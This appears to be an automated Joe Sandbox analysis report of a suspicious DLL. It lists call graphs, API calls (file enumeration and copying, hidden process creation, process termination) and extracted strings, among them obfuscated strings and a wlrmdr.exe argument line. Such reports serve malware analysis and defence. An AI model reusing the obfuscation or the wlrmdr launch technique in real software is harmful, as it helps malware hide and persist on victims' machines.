13603->13612 13625 6f9eff7f 13604->13625 13677 6f9f18e7 LeaveCriticalSection 13608->13677 13610 6f9f0019 13610->13577 13611->13603 13613 6f9f0156 __fread_nolock 13612->13613 13614 6f9f015d 13613->13614 13615 6f9f0168 13613->13615 13616 6f9f0037 ___scrt_uninitialize_crt 79 API calls 13614->13616 13628 6f9f00d8 13615->13628 13619 6f9f0163 13616->13619 13620 6f9e609e __fread_nolock 50 API calls 13619->13620 13622 6f9f01a0 13620->13622 13622->13604 13623 6f9f0189 13641 6f9f5de5 13623->13641 13676 6f9eafe1 LeaveCriticalSection 13625->13676 13627 6f9eff6d 13627->13597 13629 6f9f0118 13628->13629 13630 6f9f00f1 13628->13630 13629->13619 13634 6f9ed222 13629->13634 13630->13629 13631 6f9ed222 __fread_nolock 50 API calls 13630->13631 13632 6f9f010d 13631->13632 13652 6f9f113f 13632->13652 13635 6f9ed22e 13634->13635 13636 6f9ed243 13634->13636 13637 6f9ee7b1 __dosmaperr 17 API calls 13635->13637 13636->13623 13638 
6f9ed233 13637->13638 13639 6f9ec276 __fread_nolock 50 API calls 13638->13639 13640 6f9ed23e 13639->13640 13640->13623 13642 6f9f5df6 13641->13642 13645 6f9f5e03 13641->13645 13643 6f9ee7b1 __dosmaperr 17 API calls 13642->13643 13651 6f9f5dfb 13643->13651 13644 6f9f5e4c 13646 6f9ee7b1 __dosmaperr 17 API calls 13644->13646 13645->13644 13647 6f9f5e2a 13645->13647 13648 6f9f5e51 13646->13648 13663 6f9f5d43 13647->13663 13650 6f9ec276 __fread_nolock 50 API calls 13648->13650 13650->13651 13651->13619 13654 6f9f114b __FrameHandler3::FrameUnwindToState 13652->13654 13653 6f9f118c 13655 6f9ec1f9 __fread_nolock 33 API calls 13653->13655 13654->13653 13656 6f9f11d2 13654->13656 13662 6f9f1153 13654->13662 13655->13662 13657 6f9f33e2 __wsopen_s EnterCriticalSection 13656->13657 13658 6f9f11d8 13657->13658 13659 6f9f11f6 13658->13659 13660 6f9f1250 __wsopen_s 73 API calls 13658->13660 13661 6f9f1248 __wsopen_s LeaveCriticalSection 13659->13661 13660->13659 13661->13662 13662->13629 13664 6f9f5d4f __FrameHandler3::FrameUnwindToState 13663->13664 13665 6f9f33e2 __wsopen_s EnterCriticalSection 13664->13665 13666 6f9f5d5e 13665->13666 13667 6f9f365e __wsopen_s 50 API calls 13666->13667 13675 6f9f5da3 13666->13675 13669 6f9f5d8a FlushFileBuffers 13667->13669 13668 6f9ee7b1 __dosmaperr 17 API calls 13670 6f9f5daa 13668->13670 13669->13670 13671 6f9f5d96 GetLastError 13669->13671 13673 6f9f5dd9 ___scrt_uninitialize_crt LeaveCriticalSection 13670->13673 13672 6f9ee79e __dosmaperr 17 API calls 13671->13672 13672->13675 13674 6f9f5dc2 13673->13674 13674->13651 13675->13668 13676->13627 13677->13610 13683 6f9ed073 13678->13683 13681 6f9e4bb8 ___vcrt_uninitialize_ptd 7 API calls 13682 6f9e30ba 13681->13682 13682->12877 13686 6f9edae8 13683->13686 13687 6f9e359c 13686->13687 13688 6f9edaf2 13686->13688 13687->13681 13690 6f9efc71 13688->13690 13691 6f9efb4e __dosmaperr 5 API calls 13690->13691 13692 6f9efc8d 13691->13692 13693 6f9efca8 TlsFree 13692->13693 13694 6f9efc96 mydllmain 
15494->15493 15496 6f9f295c 15494->15496 15497 6f9f2734 15495->15497 15498 6f9f2985 GetCPInfo 15496->15498 15496->15499 15497->15462 15497->15467 15498->15493 15498->15499 15514 6f9f24f8 15499->15514 15502 6f9f2322 __FrameHandler3::FrameUnwindToState 15501->15502 15589 6f9f189f EnterCriticalSection 15502->15589 15504 6f9f232c 15590 6f9f2363 15504->15590 15509->15476 15513 6f9f18e7 LeaveCriticalSection 15510->15513 15512 6f9f2878 15512->15480 15513->15512 15515 6f9f2520 GetCPInfo 15514->15515 15516 6f9f25e9 15514->15516 15515->15516 15521 6f9f2538 15515->15521 15518 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15516->15518 15517 6f9f3cd2 __DllMainCRTStartup@12 53 API calls 15519 6f9f25a0 15517->15519 15520 6f9f269b 15518->15520 15525 6f9f7263 15519->15525 15520->15493 15521->15517 15524 6f9f7263 56 API calls 15524->15516 15526 6f9ef88b __DllMainCRTStartup@12 50 API calls 15525->15526 15527 6f9f7276 15526->15527 15530 6f9f7074 15527->15530 15531 6f9f708f 15530->15531 15558 6f9f2c0b 15531->15558 15533 6f9f724e 15534 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 15533->15534 15535 6f9f25c1 15534->15535 15535->15524 15536 6f9f70d3 15536->15533 15537 6f9ee7fe __fread_nolock 18 API calls 15536->15537 15539 6f9f70f9 __alloca_probe_16 15536->15539 15550 6f9f71a1 15536->15550 15537->15539 15538 6f9f3dd3 __freea 17 API calls 15538->15533 15540 6f9f2c0b __fread_nolock MultiByteToWideChar 15539->15540 15539->15550 15541 6f9f7142 15540->15541 15541->15550 15561 6f9efd7c 15541->15561 15544 6f9f7178 15549 6f9efd7c 8 API calls 15544->15549 15544->15550 15545 6f9f71b0 15546 6f9f7239 15545->15546 15547 6f9ee7fe __fread_nolock 18 API calls 15545->15547 15551 6f9f71c2 __alloca_probe_16 15545->15551 15548 6f9f3dd3 __freea 17 API calls 15546->15548 15547->15551 15548->15550 15549->15550 15550->15538 15551->15546 15552 6f9efd7c 8 API calls 15551->15552 15553 6f9f7205 15552->15553 15553->15546 15569 6f9f2cc5 15553->15569 
15555 6f9f721f 15555->15546 15556 6f9f7228 15555->15556 15572 6f9f3dd3 15556->15572 15576 6f9f2b73 15558->15576 15578 6f9efa4f 15561->15578 15564 6f9efd8d mydllmain 15567 6f9efdb2 15564->15567 15565 6f9efdb4 15581 6f9efdd9 15565->15581 15567->15544 15567->15545 15567->15550 15568 6f9efdcd LCMapStringW 15568->15567 15570 6f9f2cd8 __wsopen_s 15569->15570 15571 6f9f2d16 WideCharToMultiByte 15570->15571 15571->15555 15573 6f9f3ddf 15572->15573 15574 6f9f3df0 15572->15574 15573->15574 15575 6f9ee7c4 ___free_lconv_mon 17 API calls 15573->15575 15574->15550 15575->15574 15577 6f9f2b84 MultiByteToWideChar 15576->15577 15577->15536 15579 6f9efb4e __dosmaperr 5 API calls 15578->15579 15580 6f9efa65 15579->15580 15580->15564 15580->15565 15586 6f9efa69 15581->15586 15584 6f9efdea mydllmain 15585 6f9efdfa 15584->15585 15585->15568 15587 6f9efb4e __dosmaperr 5 API calls 15586->15587 15588 6f9efa7f 15587->15588 15588->15584 15588->15585 15589->15504 15591 6f9ebfd0 __fread_nolock 50 API calls 15590->15591 15592 6f9f2385 15591->15592 15593 6f9ebfd0 __fread_nolock 50 API calls 15592->15593 15594 6f9f23a4 15593->15594 15595 6f9f2339 15594->15595 15596 6f9ee7c4 ___free_lconv_mon 17 API calls 15594->15596 15597 6f9f2357 15595->15597 15596->15595 15600 6f9f18e7 LeaveCriticalSection 15597->15600 15599 6f9f2345 15599->15468 15600->15599 16515 6f9edb7b 16518 6f9edb02 16515->16518 16519 6f9edb0e __FrameHandler3::FrameUnwindToState 16518->16519 16526 6f9f189f EnterCriticalSection 16519->16526 16521 6f9edb46 16531 6f9edb64 16521->16531 16522 6f9edb18 16522->16521 16527 6f9f3a12 16522->16527 16526->16522 16528 6f9f3a20 __dosmaperr 16527->16528 16530 6f9f3a2d 16527->16530 16529 6f9f3745 __dosmaperr 17 API calls 16528->16529 16528->16530 16529->16530 16530->16522 16534 6f9f18e7 LeaveCriticalSection 16531->16534 16533 6f9edb52 16534->16533 14953 6f9e31f9 14954 6f9e3207 14953->14954 14955 6f9e3202 14953->14955 14959 6f9e30c3 14954->14959 14974 6f9e33dd 14955->14974 14960 6f9e30cf 
__FrameHandler3::FrameUnwindToState 14959->14960 14961 6f9e30f8 dllmain_raw 14960->14961 14962 6f9e30de 14960->14962 14963 6f9e30f3 14960->14963 14961->14962 14964 6f9e3112 dllmain_crt_dispatch 14961->14964 14965 6f9e1000 __DllMainCRTStartup@12 148 API calls 14963->14965 14964->14962 14964->14963 14966 6f9e3133 14965->14966 14967 6f9e3164 14966->14967 14970 6f9e1000 __DllMainCRTStartup@12 148 API calls 14966->14970 14967->14962 14968 6f9e316d dllmain_crt_dispatch 14967->14968 14968->14962 14969 6f9e3180 dllmain_raw 14968->14969 14969->14962 14971 6f9e314b 14970->14971 14972 6f9e3013 __DllMainCRTStartup@12 172 API calls 14971->14972 14973 6f9e3159 dllmain_raw 14972->14973 14973->14967 14975 6f9e33f3 14974->14975 14977 6f9e33fc 14975->14977 14978 6f9e3390 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 14975->14978 14977->14954 14978->14977

              Control-flow Graph

              APIs
              • FindFirstFileW.KERNELBASE(?,00000000,456EBF13,%s%s,00000000,00000000), ref: 6F9E16D8
              • _strlen.LIBCMT ref: 6F9E17B1
              • ExpandEnvironmentStringsW.KERNEL32(?,?,000000FF), ref: 6F9E1809
                • Part of subcall function 6F9E1CFA: CoInitialize.OLE32(00000000), ref: 6F9E1D40
                • Part of subcall function 6F9E1CFA: CoCreateInstance.OLE32(6F9FB200,00000000,00000001,6F9FB1F0,?), ref: 6F9E1D59
                • Part of subcall function 6F9E1CFA: CoUninitialize.OLE32 ref: 6F9E1D70
              • CopyFileW.KERNEL32(?,?,00000000), ref: 6F9E191C
              • Sleep.KERNEL32(000003E8), ref: 6F9E1927
                • Part of subcall function 6F9EB8FB: MoveFileExW.KERNEL32(?,6F9E1940,00000002,?,6F9E1940,?,?), ref: 6F9EB908
                • Part of subcall function 6F9EB8FB: GetLastError.KERNEL32 ref: 6F9EB912
                • Part of subcall function 6F9EB8FB: __dosmaperr.LIBCMT ref: 6F9EB919
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E1953
              • CloseHandle.KERNEL32 ref: 6F9E195F
              • CloseHandle.KERNEL32 ref: 6F9E1967
              • TerminateProcess.KERNEL32(00000000), ref: 6F9E19C4
              • CloseHandle.KERNEL32 ref: 6F9E19D0
              • CloseHandle.KERNEL32 ref: 6F9E19D8
              • FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CloseFileHandle$FindProcessTerminate$CopyCreateEnvironmentErrorExpandFirstInitializeInstanceLastMoveNextSleepStringsUninitialize__dosmaperr_strlen
              • String ID: %s%s$%s\%s$%s\*.*$%sk$-s 3600 -f 0 -t _ -m _ -a 11 -u $IRA3BDVBaRAtB@VB[BAzBDVBYtAsBKRBOdApBD7B$PT30S$WlrMakeService$wlrmdr.exe
              • API String ID: 3479604460-3724355521
              • Opcode ID: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction ID: 2b3570ad5de0d49ab488c1ca6e9674aea4e97dff0f1587f219a45bb17a011366
              • Opcode Fuzzy Hash: 865d66bfa23dd2daa7db51eadbdcba607887d4989aaba24b489d03dfd68a548e
              • Instruction Fuzzy Hash: A7B19271904349AADF21DFA4DC49BEE37B8BF19318F00822AE908961C1EB759A85CB51

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E29A3
              • GetEnvironmentVariableW.KERNEL32(?,?,00000032,?,?,?,?,?,?,?,?,?,00000001,00000000,?,00000000), ref: 6F9E29F6
                • Part of subcall function 6F9E1274: GetModuleHandleW.KERNEL32(kernel32.dll,000000C8,00000000,6FA00E3C), ref: 6F9E12AB
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E12CA
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E1318
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E1336
                • Part of subcall function 6F9E1274: GetProcAddress.KERNEL32(?), ref: 6F9E137E
                • Part of subcall function 6F9E1274: _strlen.LIBCMT ref: 6F9E13A1
              • _strlen.LIBCMT ref: 6F9E2A1C
                • Part of subcall function 6F9E140F: _strlen.LIBCMT ref: 6F9E148D
                • Part of subcall function 6F9E140F: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • Sleep.KERNELBASE(000005DC), ref: 6F9E2A74
              • Sleep.KERNELBASE(00007530), ref: 6F9E2A7B
              • _strlen.LIBCMT ref: 6F9E2A9A
              • _strlen.LIBCMT ref: 6F9E2AFD
                • Part of subcall function 6F9E1629: FindFirstFileW.KERNELBASE(?,00000000,456EBF13,%s%s,00000000,00000000), ref: 6F9E16D8
                • Part of subcall function 6F9E1629: FindNextFileW.KERNELBASE(00000000,?), ref: 6F9E19ED
              Strings
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB, xrefs: 6F9E2A01
              • [BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB, xrefs: 6F9E2A7D
              • [BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>, xrefs: 6F9E2AE2
              • gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>, xrefs: 6F9E2983
              • %s%s, xrefs: 6F9E2AC1, 6F9E2AC7, 6F9E2B2A
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: _strlen$AddressFileFindProcSleep$CreateEnvironmentFirstHandleModuleNextProcessVariable
              • String ID: %s%s$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
              • API String ID: 2056693606-1305241286
              • Opcode ID: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction ID: 17d94b2857fc7741f245efeb471b1fcccb32c793a4b521c6de76663591f44adb
              • Opcode Fuzzy Hash: df55d3a155478a89b3f0b06dd6e76a05333401030271a5f2c61872b7ee2740d8
              • Instruction Fuzzy Hash: B351FEB1904345ABD725DB60E880DEB77ECFF9924CF40492DA549932C1EB35EA05CB62

              Control-flow Graph

              APIs
              • _strlen.LIBCMT ref: 6F9E148D
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04464), ref: 6F9E151B
              • _strlen.LIBCMT ref: 6F9E1573
              • Sleep.KERNELBASE(000003E8), ref: 6F9E15EB
              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA04480), ref: 6F9E160C
              Strings
              • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6F9E1558
              • %s %s, xrefs: 6F9E14E4, 6F9E15CC
              • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6F9E146E
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: CreateProcess_strlen$Sleep
              • String ID: %s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
              • API String ID: 688041527-2059495477
              • Opcode ID: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction ID: 0a2ed944832ab80346731a79398aa8db3c606314b1904ac9d2d30e768f9b2d10
              • Opcode Fuzzy Hash: f392528dd9747850c67de7894e4d38d4821dd312b5f699fb2f2911e59873dbb5
              • Instruction Fuzzy Hash: CC5161B2504344BEE321DB64DC85FABB7ECEF99248F40482DB648D31C1EB74E9448B66

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E305A
              • ___scrt_uninitialize_crt.LIBCMT ref: 6F9E3074
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: Initialize___scrt_uninitialize_crt
              • String ID:
              • API String ID: 2442719207-0
              • Opcode ID: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction ID: 2838cea00fcf763d6ca778bbbb107e5b8b1a72ecfc90231cdc09bd71a6973925
              • Opcode Fuzzy Hash: 08a5ccfb64dd6d1db816cfbae6590f655f48eb6b415d1fce6836fc06bceb3bac
              • Instruction Fuzzy Hash: 4141B172D04714EEDB228FB5D842FAE7E79EF817A9F00411AE814562E1D731D9068FA0

              Control-flow Graph

              control_flow_graph (entry 6f9e30c3): rendered graph edge list and executed/not-executed node colouring omitted as figure residue; the graph calls 6f9e38c0, 6f9e1000 and 6f9e3013 and passes through dllmain_raw and dllmain_crt_dispatch.
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: dllmain_raw$dllmain_crt_dispatch
              • String ID:
              • API String ID: 3136044242-0
              • Opcode ID: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction ID: 3cfb22a009475ad28d025200fece35524928e05d4f0d5e0287fb5159dbdaf047
              • Opcode Fuzzy Hash: a76b709614151968b494c9b7d4a54c37225d2d521a341383d6d2daae4fe11e71
              • Instruction Fuzzy Hash: 17217C72E04715EECB338F75C842EAF3E79AF81B95B00411AF8145A2E1D731DD418BA0

              Control-flow Graph

              APIs
              • __RTC_Initialize.LIBCMT ref: 6F9E2F59
                • Part of subcall function 6F9E385E: mydllmain.DLL1(00000001,00000000,00000001,6F9E2F5E,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001), ref: 6F9E3877
                • Part of subcall function 6F9E3428: InitializeSListHead.KERNEL32(6FA03D60,6F9E2F63,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8), ref: 6F9E342D
                • Part of subcall function 6F9EC38F: mydllmain.DLL1(?,6F9EAAAA,?,6F9EC639,6F9FB194,6F9FB198,6FA02248,00000014,6F9EC571,6FA02268,00000008,6F9EC6F9,6F9E6503,?,B586E81C,456EBF13), ref: 6F9EC3A6
              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F9E2FC3
              • mydllmain.DLL1(?,00000002,00000001,6FA01F80,00000010,6F9E2EF4,?,?,?,6F9E311C,?,00000001,?,?,00000001,?), ref: 6F9E2FD9
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain$Initialize$HeadList___scrt_is_nonwritable_in_current_image
              • String ID:
              • API String ID: 1337761313-0
              • Opcode ID: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction ID: b97925093bbd51652eede3a5556f00390acfe1ff0f7d462d8c0bc127fa2994aa
              • Opcode Fuzzy Hash: 0e771cbaadb0c3c276046ba51d543496db5c172226b7bc970c9b55ed07a4ac0a
              • Instruction Fuzzy Hash: 5921D572A08702AADF135FB5D802FDD3F616F6637CF10481AD4856B1D2DB32D056C612

              Control-flow Graph

              control_flow_graph (entry 6f9ee5d8): rendered graph edge list and executed/not-executed node colouring omitted as figure residue; the graph contains the GetStdHandle and GetFileType calls listed below.
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 6F9EE624
              • GetFileType.KERNELBASE(00000000), ref: 6F9EE636
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: FileHandleType
              • String ID:
              • API String ID: 3000768030-0
              • Opcode ID: 794e38b7d0b160581cd887f6f084ed83614d568fe34320fa3a6c9d188be21a87
              • Instruction ID: b9c82337add3aca1406bb604f1e19d11d0249ea79b55bfe257f24f1b116c8a2d
              • Opcode Fuzzy Hash: 794e38b7d0b160581cd887f6f084ed83614d568fe34320fa3a6c9d188be21a87
              • Instruction Fuzzy Hash: D011E671A04B524ADB326E3E8C987567AACAF4B734B26071FE0B6871F1C630E4868644

              Control-flow Graph

              control_flow_graph (entry 6f9f2e90): rendered graph edge list and executed/not-executed node colouring omitted as figure residue; the graph calls mydllmain twice and dispatches to 6f9ee5d8 or 6f9ee688.
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction ID: 6f31454d5a35569047882b67defe9587e3a8c6f2a3edcfb6ad8386f54621df05
              • Opcode Fuzzy Hash: db44138d5476bce643345ed35bfeae61f6856f6db0661a7a4afa86fe4605d2e8
              • Instruction Fuzzy Hash: C301A232A0669497DF229E599CC43EAB36D9F51220B21052EEC7A6B2C0C771FC4687A0

              Control-flow Graph

              control_flow_graph (entry 6f9f2e87): rendered graph edge list and executed/not-executed node colouring omitted as figure residue; the graph calls mydllmain twice and dispatches to 6f9ee5d8 or 6f9ee688.
              APIs
              • mydllmain.DLL1(00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?,?), ref: 6F9F2EAA
              • mydllmain.DLL1(00000000,00000001,00000000,?,?,6F9ED02D,6F9FC018,6F9FC098,6F9E35C9,?,6F9E2F1F,00000000,6FA01F80,00000010,6F9E2EF4,?), ref: 6F9F2EDA
              Memory Dump Source
              • Source File: 00000000.00000002.2085129168.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000000.00000002.2085114468.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085150636.000000006F9FB000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085165725.000000006FA03000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2085182312.000000006FA05000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6f9e0000_loaddll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction ID: 306308cec314d3d4e74cb6ca6f566e4aeb82a701340c2a867a4e01a15f8a8999
              • Opcode Fuzzy Hash: 157b67d090d7dbf46f6b7ee6b837fdeedfd49d8a45799cbc4cc7e21b528c7489
              • Instruction Fuzzy Hash: A701FC32A066845BDF129E18DCC43AAB36C9F51224B21052EDC766F1C1C735F8468790

              Control-flow Graph

              control_flow_graph (entry 6f9ef9d8): rendered graph edge list and executed/not-executed node colouring omitted as figure residue; the graph calls RtlAllocateHeap, 6f9ee7b1, 6f9f3e49 and 6f9ec30c.
              APIs
